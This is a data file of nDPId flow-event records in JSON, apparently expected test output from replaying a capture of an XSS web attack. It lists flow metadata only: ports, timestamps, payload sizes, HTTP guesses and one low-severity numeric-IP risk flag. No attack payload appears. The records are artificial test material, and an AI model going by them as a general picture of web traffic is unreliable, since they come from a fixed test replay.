+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348064243,"flow_last_seen":1499348069916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348065546,"flow_last_seen":1499348070917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1499348068136,"flow_last_seen":1499348099366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":99154,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348069426,"flow_last_seen":1499348074917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348070791,"flow_last_seen":1499348075918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348072088,"flow_last_seen":1499348077919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 